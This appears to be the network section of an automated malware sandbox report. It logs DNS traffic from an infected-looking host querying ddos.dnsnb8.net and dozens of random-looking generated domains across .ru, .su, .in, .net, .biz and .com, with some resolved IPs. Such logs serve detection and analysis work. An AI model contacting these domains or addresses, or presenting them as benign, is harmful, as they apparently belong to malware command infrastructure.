Jul 25, 2024 15:16:09.702545881 CEST	53	51042	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:09.705974102 CEST	53	51042	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:11.535825014 CEST	51644	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:11.545438051 CEST	53	51644	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:12.661448956 CEST	55807	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:12.850660086 CEST	53	55807	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:14.771421909 CEST	51934	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:14.781003952 CEST	53	51934	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:15.896528006 CEST	64762	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:15.907104969 CEST	53	64762	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:17.022145987 CEST	53308	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:17.036204100 CEST	53	53308	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:18.161525011 CEST	49643	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:18.470674992 CEST	49643	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:18.547014952 CEST	53	49643	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:18.547034025 CEST	53	49643	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:19.661390066 CEST	58124	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:19.672938108 CEST	53	58124	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:20.785829067 CEST	52392	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:20.971801996 CEST	53	52392	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:23.254614115 CEST	55763	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:23.268949032 CEST	53	55763	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:24.395832062 CEST	61481	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:24.421735048 CEST	53	61481	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:25.536344051 CEST	61094	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:25.547086954 CEST	53	61094	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:26.661854029 CEST	57463	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:26.699956894 CEST	53	57463	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:27.818262100 CEST	51387	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:27.854243994 CEST	53	51387	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:28.989650011 CEST	59201	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:29.299026966 CEST	59201	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:29.667366028 CEST	53	59201	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:29.667426109 CEST	53	59201	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:31.676738024 CEST	60925	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:31.708091974 CEST	53	60925	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:32.832775116 CEST	61233	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:32.867100000 CEST	53	61233	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:33.988774061 CEST	50216	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:34.064666033 CEST	53	50216	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:35.193286896 CEST	61016	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:35.205379009 CEST	53	61016	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:36.332726002 CEST	58450	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:36.356127977 CEST	53	58450	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:58.976277113 CEST	54700	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:59.144759893 CEST	53	54700	1.1.1.1	192.168.2.6
Jul 25, 2024 15:17:00.271507025 CEST	51423	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:17:00.581366062 CEST	51423	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:17:00.713849068 CEST	53	51423	1.1.1.1	192.168.2.6
Jul 25, 2024 15:17:00.714055061 CEST	53	51423	1.1.1.1	192.168.2.6
Jul 25, 2024 15:17:01.832855940 CEST	51877	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:17:02.146177053 CEST	51877	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:17:03.146320105 CEST	51877	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:17:03.151489019 CEST	53	51877	1.1.1.1	192.168.2.6
Jul 25, 2024 15:17:03.154779911 CEST	53	51877	1.1.1.1	192.168.2.6
Jul 25, 2024 15:17:03.156706095 CEST	53	51877	1.1.1.1	192.168.2.6
Jul 25, 2024 15:17:04.270579100 CEST	63731	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:17:04.484365940 CEST	53	63731	1.1.1.1	192.168.2.6
Jul 25, 2024 15:17:06.379900932 CEST	59574	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:17:06.430552959 CEST	53	59574	1.1.1.1	192.168.2.6
Jul 25, 2024 15:17:07.552309036 CEST	60946	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:17:07.861299038 CEST	60946	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:17:07.928505898 CEST	53	60946	1.1.1.1	192.168.2.6
Jul 25, 2024 15:17:07.928594112 CEST	53	60946	1.1.1.1	192.168.2.6
Jul 25, 2024 15:17:11.082887888 CEST	58207	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:17:11.092981100 CEST	53	58207	1.1.1.1	192.168.2.6
Jul 25, 2024 15:17:12.207854033 CEST	60700	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:17:12.517626047 CEST	60700	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:17:12.584923029 CEST	53	60700	1.1.1.1	192.168.2.6
Jul 25, 2024 15:17:12.584997892 CEST	53	60700	1.1.1.1	192.168.2.6
Jul 25, 2024 15:17:13.713542938 CEST	58544	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:17:13.724020958 CEST	53	58544	1.1.1.1	192.168.2.6
Jul 25, 2024 15:17:16.928518057 CEST	60826	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:17:16.942445040 CEST	53	60826	1.1.1.1	192.168.2.6
Jul 25, 2024 15:17:19.942061901 CEST	49317	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:17:19.954668045 CEST	53	49317	1.1.1.1	192.168.2.6
Jul 25, 2024 15:17:21.083864927 CEST	51600	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:17:21.095153093 CEST	53	51600	1.1.1.1	192.168.2.6
Jul 25, 2024 15:17:22.225972891 CEST	54556	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:17:22.272984982 CEST	53	54556	1.1.1.1	192.168.2.6
Jul 25, 2024 15:17:23.415957928 CEST	59245	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:17:23.427980900 CEST	53	59245	1.1.1.1	192.168.2.6
Jul 25, 2024 15:17:24.552949905 CEST	53517	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:17:24.569910049 CEST	53	53517	1.1.1.1	192.168.2.6
Jul 25, 2024 15:17:28.536509037 CEST	60671	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:17:28.697144032 CEST	53	60671	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 15:13:19.352777958 CEST	192.168.2.6	1.1.1.1	0xf2a9	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:13:40.199372053 CEST	192.168.2.6	1.1.1.1	0x350	Standard query (0)	ssofhoseuegsgrfnu.ru	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:13:41.218578100 CEST	192.168.2.6	1.1.1.1	0x350	Standard query (0)	ssofhoseuegsgrfnu.ru	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:13:42.547554970 CEST	192.168.2.6	1.1.1.1	0xe56f	Standard query (0)	ww88.ssofhoseuegsgrfnu.ru	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:06.944644928 CEST	192.168.2.6	1.1.1.1	0xaaac	Standard query (0)	slpsrgpsrhojifdij.ru	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:29.647766113 CEST	192.168.2.6	1.1.1.1	0xef23	Standard query (0)	aiiaiafrzrueuedur.ru	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:39.145549059 CEST	192.168.2.6	1.1.1.1	0xbe91	Standard query (0)	fuaiuebndieufeufu.ru	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:40.316734076 CEST	192.168.2.6	1.1.1.1	0xe39b	Standard query (0)	eiifngjfksisiufjf.ru	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:41.801616907 CEST	192.168.2.6	1.1.1.1	0xf43b	Standard query (0)	eoroooskfogihisrg.ru	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:42.973072052 CEST	192.168.2.6	1.1.1.1	0x193a	Standard query (0)	noeuaoenriusfiruu.ru	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:44.191970110 CEST	192.168.2.6	1.1.1.1	0x1f52	Standard query (0)	iuirshriuisruruuf.ru	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:45.584778070 CEST	192.168.2.6	1.1.1.1	0x128e	Standard query (0)	afeifieuuufufufuf.ru	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:46.973747969 CEST	192.168.2.6	1.1.1.1	0xb3af	Standard query (0)	srndndubsbsifurfd.ru	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:48.161391020 CEST	192.168.2.6	1.1.1.1	0xabd9	Standard query (0)	fiiauediehduefuge.ru	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:50.240822077 CEST	192.168.2.6	1.1.1.1	0xf091	Standard query (0)	nousiieiffgogogoo.ru	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:51.443193913 CEST	192.168.2.6	1.1.1.1	0x71a1	Standard query (0)	fifiehsueuufidhfi.ru	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:52.646769047 CEST	192.168.2.6	1.1.1.1	0xc6b9	Standard query (0)	eofihsishihiursgu.ru	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:53.818129063 CEST	192.168.2.6	1.1.1.1	0xe295	Standard query (0)	nnososoosjfeuhueu.ru	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:55.036415100 CEST	192.168.2.6	1.1.1.1	0x676b	Standard query (0)	ssofhoseuegsgrfnj.su	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:00.365200996 CEST	192.168.2.6	1.1.1.1	0x7a0e	Standard query (0)	slpsrgpsrhojifdij.su	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:01.536808968 CEST	192.168.2.6	1.1.1.1	0x72e0	Standard query (0)	aiiaiafrzrueuedur.su	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:02.739101887 CEST	192.168.2.6	1.1.1.1	0x313f	Standard query (0)	fuaiuebndieufeufu.su	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:04.004798889 CEST	192.168.2.6	1.1.1.1	0x6e37	Standard query (0)	eiifngjfksisiufjf.su	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:05.223871946 CEST	192.168.2.6	1.1.1.1	0xb8ed	Standard query (0)	eoroooskfogihisrg.su	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:06.395818949 CEST	192.168.2.6	1.1.1.1	0xa674	Standard query (0)	noeuaoenriusfiruu.su	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:07.569322109 CEST	192.168.2.6	1.1.1.1	0x7fb1	Standard query (0)	iuirshriuisruruuf.su	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:08.770872116 CEST	192.168.2.6	1.1.1.1	0x3fd7	Standard query (0)	afeifieuuufufufuf.su	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:14.560338974 CEST	192.168.2.6	1.1.1.1	0x8162	Standard query (0)	srndndubsbsifurfd.su	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:15.741241932 CEST	192.168.2.6	1.1.1.1	0xae44	Standard query (0)	fiiauediehduefuge.su	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:16.946208954 CEST	192.168.2.6	1.1.1.1	0xae2b	Standard query (0)	nousiieiffgogogoo.su	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:18.145437956 CEST	192.168.2.6	1.1.1.1	0xe3fb	Standard query (0)	fifiehsueuufidhfi.su	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:19.317435980 CEST	192.168.2.6	1.1.1.1	0x66be	Standard query (0)	eofihsishihiursgu.su	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:20.541022062 CEST	192.168.2.6	1.1.1.1	0xa40	Standard query (0)	nnososoosjfeuhueu.su	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:21.886759996 CEST	192.168.2.6	1.1.1.1	0x4783	Standard query (0)	ssofhoseuegsgrfnj.in	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:23.755763054 CEST	192.168.2.6	1.1.1.1	0x820e	Standard query (0)	slpsrgpsrhojifdij.in	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:24.896142960 CEST	192.168.2.6	1.1.1.1	0x3195	Standard query (0)	aiiaiafrzrueuedur.in	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:26.551851034 CEST	192.168.2.6	1.1.1.1	0x60b8	Standard query (0)	fuaiuebndieufeufu.in	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:27.680366993 CEST	192.168.2.6	1.1.1.1	0xbbf0	Standard query (0)	eiifngjfksisiufjf.in	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:29.536102057 CEST	192.168.2.6	1.1.1.1	0x5887	Standard query (0)	eoroooskfogihisrg.in	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:30.726440907 CEST	192.168.2.6	1.1.1.1	0x1ee1	Standard query (0)	noeuaoenriusfiruu.in	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:32.000504971 CEST	192.168.2.6	1.1.1.1	0x1235	Standard query (0)	iuirshriuisruruuf.in	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:34.444164991 CEST	192.168.2.6	1.1.1.1	0x52c2	Standard query (0)	afeifieuuufufufuf.in	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:35.584157944 CEST	192.168.2.6	1.1.1.1	0x6f4d	Standard query (0)	srndndubsbsifurfd.in	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:36.942497969 CEST	192.168.2.6	1.1.1.1	0x2f71	Standard query (0)	fiiauediehduefuge.in	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:38.067801952 CEST	192.168.2.6	1.1.1.1	0x3652	Standard query (0)	nousiieiffgogogoo.in	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:39.200510025 CEST	192.168.2.6	1.1.1.1	0x90bb	Standard query (0)	fifiehsueuufidhfi.in	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:40.348548889 CEST	192.168.2.6	1.1.1.1	0x3829	Standard query (0)	eofihsishihiursgu.in	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:41.490008116 CEST	192.168.2.6	1.1.1.1	0x4d2b	Standard query (0)	nnososoosjfeuhueu.in	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:42.629760981 CEST	192.168.2.6	1.1.1.1	0x4364	Standard query (0)	ssofhoseuegsgrfnj.net	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:43.770972967 CEST	192.168.2.6	1.1.1.1	0x1ead	Standard query (0)	slpsrgpsrhojifdij.net	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:46.504739046 CEST	192.168.2.6	1.1.1.1	0x60b4	Standard query (0)	aiiaiafrzrueuedur.net	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:48.599304914 CEST	192.168.2.6	1.1.1.1	0x6c65	Standard query (0)	fuaiuebndieufeufu.net	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:49.740118980 CEST	192.168.2.6	1.1.1.1	0x83b	Standard query (0)	eiifngjfksisiufjf.net	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:50.879848957 CEST	192.168.2.6	1.1.1.1	0x3c3d	Standard query (0)	eoroooskfogihisrg.net	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:52.036026001 CEST	192.168.2.6	1.1.1.1	0xc6bc	Standard query (0)	noeuaoenriusfiruu.net	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:53.162728071 CEST	192.168.2.6	1.1.1.1	0x5404	Standard query (0)	iuirshriuisruruuf.net	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:54.301779985 CEST	192.168.2.6	1.1.1.1	0x5e49	Standard query (0)	afeifieuuufufufuf.net	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:55.428741932 CEST	192.168.2.6	1.1.1.1	0x2a3d	Standard query (0)	srndndubsbsifurfd.net	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:56.601383924 CEST	192.168.2.6	1.1.1.1	0x996b	Standard query (0)	fiiauediehduefuge.net	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:56.911587000 CEST	192.168.2.6	1.1.1.1	0x996b	Standard query (0)	fiiauediehduefuge.net	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:58.035763025 CEST	192.168.2.6	1.1.1.1	0x22f5	Standard query (0)	nousiieiffgogogoo.net	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:00.741215944 CEST	192.168.2.6	1.1.1.1	0xd5d4	Standard query (0)	fifiehsueuufidhfi.net	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:01.880450964 CEST	192.168.2.6	1.1.1.1	0x1a03	Standard query (0)	eofihsishihiursgu.net	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:03.676770926 CEST	192.168.2.6	1.1.1.1	0x1d26	Standard query (0)	ssofhoseuegsgrfnj.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:05.708499908 CEST	192.168.2.6	1.1.1.1	0x7254	Standard query (0)	slpsrgpsrhojifdij.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:06.833108902 CEST	192.168.2.6	1.1.1.1	0xf629	Standard query (0)	aiiaiafrzrueuedur.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:08.036030054 CEST	192.168.2.6	1.1.1.1	0xf2b7	Standard query (0)	fuaiuebndieufeufu.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:09.161227942 CEST	192.168.2.6	1.1.1.1	0x42e2	Standard query (0)	eiifngjfksisiufjf.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:09.470685005 CEST	192.168.2.6	1.1.1.1	0x42e2	Standard query (0)	eiifngjfksisiufjf.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:11.535825014 CEST	192.168.2.6	1.1.1.1	0x63ae	Standard query (0)	eoroooskfogihisrg.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:12.661448956 CEST	192.168.2.6	1.1.1.1	0x9fe7	Standard query (0)	noeuaoenriusfiruu.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:14.771421909 CEST	192.168.2.6	1.1.1.1	0xd8d5	Standard query (0)	iuirshriuisruruuf.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:15.896528006 CEST	192.168.2.6	1.1.1.1	0x91e7	Standard query (0)	afeifieuuufufufuf.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:17.022145987 CEST	192.168.2.6	1.1.1.1	0x32c9	Standard query (0)	srndndubsbsifurfd.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:18.161525011 CEST	192.168.2.6	1.1.1.1	0x1ddb	Standard query (0)	fiiauediehduefuge.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:18.470674992 CEST	192.168.2.6	1.1.1.1	0x1ddb	Standard query (0)	fiiauediehduefuge.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:19.661390066 CEST	192.168.2.6	1.1.1.1	0xd87f	Standard query (0)	nousiieiffgogogoo.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:20.785829067 CEST	192.168.2.6	1.1.1.1	0x3f02	Standard query (0)	fifiehsueuufidhfi.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:23.254614115 CEST	192.168.2.6	1.1.1.1	0x5779	Standard query (0)	eofihsishihiursgu.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:24.395832062 CEST	192.168.2.6	1.1.1.1	0x5dab	Standard query (0)	nnososoosjfeuhueu.net	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:25.536344051 CEST	192.168.2.6	1.1.1.1	0x1b62	Standard query (0)	ssofhoseuegsgrfnj.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:26.661854029 CEST	192.168.2.6	1.1.1.1	0x319c	Standard query (0)	slpsrgpsrhojifdij.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:27.818262100 CEST	192.168.2.6	1.1.1.1	0x3ad4	Standard query (0)	aiiaiafrzrueuedur.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:28.989650011 CEST	192.168.2.6	1.1.1.1	0xa8ba	Standard query (0)	fuaiuebndieufeufu.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:29.299026966 CEST	192.168.2.6	1.1.1.1	0xa8ba	Standard query (0)	fuaiuebndieufeufu.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:31.676738024 CEST	192.168.2.6	1.1.1.1	0x53d7	Standard query (0)	eiifngjfksisiufjf.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:32.832775116 CEST	192.168.2.6	1.1.1.1	0xa3c9	Standard query (0)	eoroooskfogihisrg.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:33.988774061 CEST	192.168.2.6	1.1.1.1	0x8f77	Standard query (0)	noeuaoenriusfiruu.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:35.193286896 CEST	192.168.2.6	1.1.1.1	0x5675	Standard query (0)	iuirshriuisruruuf.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:36.332726002 CEST	192.168.2.6	1.1.1.1	0xb2d3	Standard query (0)	afeifieuuufufufuf.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:58.976277113 CEST	192.168.2.6	1.1.1.1	0xe359	Standard query (0)	srndndubsbsifurfd.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:00.271507025 CEST	192.168.2.6	1.1.1.1	0xcdde	Standard query (0)	fiiauediehduefuge.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:00.581366062 CEST	192.168.2.6	1.1.1.1	0xcdde	Standard query (0)	fiiauediehduefuge.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:01.832855940 CEST	192.168.2.6	1.1.1.1	0xa871	Standard query (0)	nousiieiffgogogoo.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:02.146177053 CEST	192.168.2.6	1.1.1.1	0xa871	Standard query (0)	nousiieiffgogogoo.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:03.146320105 CEST	192.168.2.6	1.1.1.1	0xa871	Standard query (0)	nousiieiffgogogoo.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:04.270579100 CEST	192.168.2.6	1.1.1.1	0x599a	Standard query (0)	fifiehsueuufidhfi.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:06.379900932 CEST	192.168.2.6	1.1.1.1	0x2872	Standard query (0)	eofihsishihiursgu.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:07.552309036 CEST	192.168.2.6	1.1.1.1	0x93ea	Standard query (0)	nnososoosjfeuhueu.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:07.861299038 CEST	192.168.2.6	1.1.1.1	0x93ea	Standard query (0)	nnososoosjfeuhueu.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:11.082887888 CEST	192.168.2.6	1.1.1.1	0xba10	Standard query (0)	slpsrgpsrhojifdij.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:12.207854033 CEST	192.168.2.6	1.1.1.1	0x22e5	Standard query (0)	aiiaiafrzrueuedur.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:12.517626047 CEST	192.168.2.6	1.1.1.1	0x22e5	Standard query (0)	aiiaiafrzrueuedur.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:13.713542938 CEST	192.168.2.6	1.1.1.1	0x8c3e	Standard query (0)	fuaiuebndieufeufu.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:16.928518057 CEST	192.168.2.6	1.1.1.1	0x6220	Standard query (0)	eoroooskfogihisrg.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:19.942061901 CEST	192.168.2.6	1.1.1.1	0xf449	Standard query (0)	iuirshriuisruruuf.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:21.083864927 CEST	192.168.2.6	1.1.1.1	0xdb3f	Standard query (0)	afeifieuuufufufuf.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:22.225972891 CEST	192.168.2.6	1.1.1.1	0x5083	Standard query (0)	srndndubsbsifurfd.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:23.415957928 CEST	192.168.2.6	1.1.1.1	0xec04	Standard query (0)	fiiauediehduefuge.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:24.552949905 CEST	192.168.2.6	1.1.1.1	0x8ab	Standard query (0)	nousiieiffgogogoo.biz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:28.536509037 CEST	192.168.2.6	1.1.1.1	0xa5fb	Standard query (0)	eofihsishihiursgu.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 15:13:19.451169968 CEST	1.1.1.1	192.168.2.6	0xf2a9	No error (0)	ddos.dnsnb8.net		44.221.84.105	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:13:41.555955887 CEST	1.1.1.1	192.168.2.6	0x350	No error (0)	ssofhoseuegsgrfnu.ru		170.39.226.155	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:13:41.556565046 CEST	1.1.1.1	192.168.2.6	0x350	No error (0)	ssofhoseuegsgrfnu.ru		170.39.226.155	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:13:42.754754066 CEST	1.1.1.1	192.168.2.6	0xe56f	No error (0)	ww88.ssofhoseuegsgrfnu.ru	86537.BODIS.COM		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 15:13:42.754754066 CEST	1.1.1.1	192.168.2.6	0xe56f	No error (0)	86537.BODIS.COM		199.59.243.226	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:07.002186060 CEST	1.1.1.1	192.168.2.6	0xaaac	No error (0)	slpsrgpsrhojifdij.ru		92.246.89.93	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:30.005697012 CEST	1.1.1.1	192.168.2.6	0xef23	No error (0)	aiiaiafrzrueuedur.ru		92.246.89.93	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:39.196909904 CEST	1.1.1.1	192.168.2.6	0xbe91	Name error (3)	fuaiuebndieufeufu.ru	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:40.575145960 CEST	1.1.1.1	192.168.2.6	0xe39b	Name error (3)	eiifngjfksisiufjf.ru	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:41.853352070 CEST	1.1.1.1	192.168.2.6	0xf43b	Name error (3)	eoroooskfogihisrg.ru	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:43.075299025 CEST	1.1.1.1	192.168.2.6	0x193a	Name error (3)	noeuaoenriusfiruu.ru	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:44.449604034 CEST	1.1.1.1	192.168.2.6	0x1f52	Name error (3)	iuirshriuisruruuf.ru	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:45.855427027 CEST	1.1.1.1	192.168.2.6	0x128e	Name error (3)	afeifieuuufufufuf.ru	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:47.028892040 CEST	1.1.1.1	192.168.2.6	0xb3af	Name error (3)	srndndubsbsifurfd.ru	none	none	A (IP address)	IN (0x0001)	false
